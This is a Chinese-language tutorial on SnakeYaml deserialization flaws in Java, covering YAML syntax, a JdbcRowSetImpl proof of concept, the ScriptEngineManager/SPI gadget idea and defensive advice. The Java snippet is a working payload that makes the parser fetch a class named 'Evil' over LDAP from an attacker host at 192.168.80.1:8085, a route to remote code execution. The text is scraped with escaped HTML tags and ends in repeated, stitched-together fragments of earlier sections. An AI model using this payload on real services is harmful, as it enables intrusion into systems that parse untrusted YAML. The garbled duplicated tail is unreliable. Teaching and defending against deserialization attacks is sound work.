SnakeYaml反序列化漏洞深入解析<\/h1>

1. SnakeYaml简介<\/h2>
SnakeYaml是Java的YAML解析类库，支持Java对象的序列化\/反序列化。它使用缩进代表层级关系（只能用空格，不能用TAB）。<\/p>

YAML基本语法<\/h3>

对象<\/strong>：<\/p>

使用冒号表示，格式为key: value<\/code>（冒号后要加空格）<\/li>
缩进表示层级关系： key<\/span>: <\/span><\/span> child-key<\/span>: value<\/span> <\/span><\/span> child-key2<\/span>: value2<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 数组<\/strong>：<\/p> 使用短横线加空格表示数组项： hobby<\/span>: <\/span><\/span> - Java<\/span> <\/span><\/span> - LOL<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 常量类型<\/strong>：<\/p> 支持多种常量结构：整数、浮点数、字符串、NULL、日期、布尔、时间<\/li> 示例： boolean<\/span>: <\/span><\/span> - TRUE<\/span> # true,True都可以<\/span> <\/span><\/span> - FALSE<\/span> # false,False都可以<\/span> <\/span><\/span>float<\/span>: <\/span><\/span> - 3.14<\/span> <\/span><\/span> - 6.8523015e+5<\/span> # 科学计数法<\/span> <\/span><\/span>int<\/span>: <\/span><\/span> - 123<\/span> <\/span><\/span> - 0b1010_0111_0100_1010_1110 <\/span> # 二进制表示<\/span> <\/span><\/span>null<\/span>: <\/span><\/span> nodeName<\/span>: 'node'<\/span> <\/span><\/span> parent<\/span>: ~ <\/span> # 使用~表示null<\/span> <\/span><\/span>string<\/span>: <\/span><\/span> - 哈哈<\/span> <\/span><\/span> - 'Hello world'<\/span> # 双引号或单引号包裹特殊字符<\/span> <\/span><\/span> - newline newline2 <\/span> # 多行字符串会转化为空格<\/span> <\/span><\/span>date<\/span>: <\/span><\/span> - 2022-07-28<\/span> # ISO 8601格式(yyyy-MM-dd)<\/span> <\/span><\/span>datetime<\/span>: <\/span><\/span> - 2022-07-28T15:02:31<\/span>+08<\/span>:00<\/span> # ISO 8601格式，T连接时间日期，+表示时区<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 2. SnakeYaml反序列化漏洞<\/h2> 基本利用方式<\/h3> SnakeYaml提供了两个关键函数：<\/p> Yaml.load()<\/code>：将YAML字符串或文件反序列化为Java对象<\/li> Yaml.dump()<\/code>：将Java对象序列化为YAML格式<\/li> <\/ul> 漏洞点<\/strong>：<\/p> 反序列化时可以用!!<\/code>指定类名（类似Fastjson）<\/li> 通过setter方法赋值<\/li> 全版本可利用（示例使用1.27版本）<\/li> <\/ul> JdbcRowSetImpl利用链<\/h3> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> String str =<\/span> "!!com.sun.rowset.JdbcRowSetImpl\n"<\/span> +<\/span> <\/span><\/span> "{\n"<\/span> +<\/span> <\/span><\/span> "dataSourceName: ldap:\/\/192.168.80.1:8085\/Evil,\n"<\/span> +<\/span> <\/span><\/span> "autoCommit: false\n"<\/span> +<\/span> <\/span><\/span> "}"<\/span>;<\/span> <\/span><\/span> Yaml yaml =<\/span> new<\/span> Yaml();<\/span> <\/span><\/span> yaml.<\/span>load<\/span>(<\/span>str);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>注意事项<\/strong>：<\/p> SnakeYaml不能互转false<\/code>和0<\/code>，payload中必须使用false<\/code><\/li> 与Fastjson类似，可以使用JdbcRowSetImpl<\/code>进行利用<\/li> <\/ul> ScriptEngineManager利用链（SPI机制）<\/h3> SPI机制原理<\/h4> Java SPI (Service Provider Interface)是一种服务发现机制，允许运行时动态加载实现特定接口的类。<\/p> 关键流程<\/strong>：<\/p> 使用ServiceLoader.load(Class<T> service)<\/code>加载服务<\/li> 检查META-INF\/services<\/code>目录下是否存在以接口全限定名命名的文件<\/li> 读取文件内容获取实现类的全限定名<\/li> 通过Class.forName()<\/code>加载对应类<\/li> <\/ol> 特点<\/strong>：<\/p> 返回懒加载迭代器（LazyIterator）<\/li> 只有在遍历迭代器时才会按需加载类和创建实例<\/li> <\/ul> SPI源码分析<\/h4> ServiceLoader.load(Class<T> service)<\/code>调用重载方法<\/li> 构造函数调用reload()<\/code><\/li> reload()<\/code>生成LazyIterator<\/code><\/li> LazyIterator<\/code>关键方法： hasNext()<\/code> → hasNextService()<\/code><\/li> next()<\/code> → nextService()<\/code><\/li> <\/ul> <\/li> hasNextService()<\/code>：获取类路径为META-INF\/services\/<\/code>+类名<\/li> 使用getResource<\/code>获取configs路径<\/li> 解析configs文件<\/li> <\/ul> <\/li> nextService()<\/code>：完成Class.forName<\/code>初始化<\/li> 执行newInstance<\/code>实例化<\/li> <\/ul> <\/li> <\/ol> 漏洞利用思路<\/h4> 如果load<\/code>的参数可以是HTTP URL，则ServiceLoader.load<\/code>可能加载远程META-INF\/services<\/code>下的恶意类。<\/p> SPI正常使用示例<\/h4> 定义接口<\/li> 创建实现类<\/li> 配置文件：在META-INF\/services<\/code>目录下创建以接口全限定名命名的文件<\/li> 文件内容为实现类的全限定名（每行一个）<\/li> <\/ul> <\/li> <\/ol> 3. 防御建议<\/h2> 避免反序列化不可信数据<\/li> 使用安全配置或白名单限制可反序列化的类<\/li> 及时更新到安全版本（如果有）<\/li> 对YAML输入进行严格验证<\/li> <\/ol> 4. 总结<\/h2> SnakeYaml的反序列化漏洞主要源于：<\/p> 允许通过!!<\/code>指定任意类进行实例化<\/li> 通过setter方法进行属性赋值<\/li> 可利用Java内置的危险类（如JdbcRowSetImpl<\/code>）<\/li> 结合SPI机制可能实现远程类加载<\/li> <\/ol> 理解这些机制对于防御YAML反序列化攻击至关重要。<\/p>

SnakeYaml反序列化漏洞深入解析<\/h1>

1. SnakeYaml简介<\/h2> SnakeYaml是Java的YAML解析类库，支持Java对象的序列化\/反序列化。它使用缩进代表层级关系（只能用空格，不能用TAB）。<\/p>

2. SnakeYaml反序列化漏洞<\/h2>

ScriptEngineManager利用链（SPI机制）<\/h3>

漏洞利用思路<\/h4> 如果load<\/code>的参数可以是HTTP URL，则ServiceLoader.load<\/code>可能加载远程META-INF\/services<\/code>下的恶意类。<\/p>

1. SnakeYaml简介<\/h2>
SnakeYaml是Java的YAML解析类库，支持Java对象的序列化\/反序列化。它使用缩进代表层级关系（只能用空格，不能用TAB）。<\/p>

漏洞利用思路<\/h4>
如果`load<\/code>的参数可以是HTTP URL，则ServiceLoader.load<\/code>可能加载远程META-INF\/services<\/code>下的恶意类。<\/p>`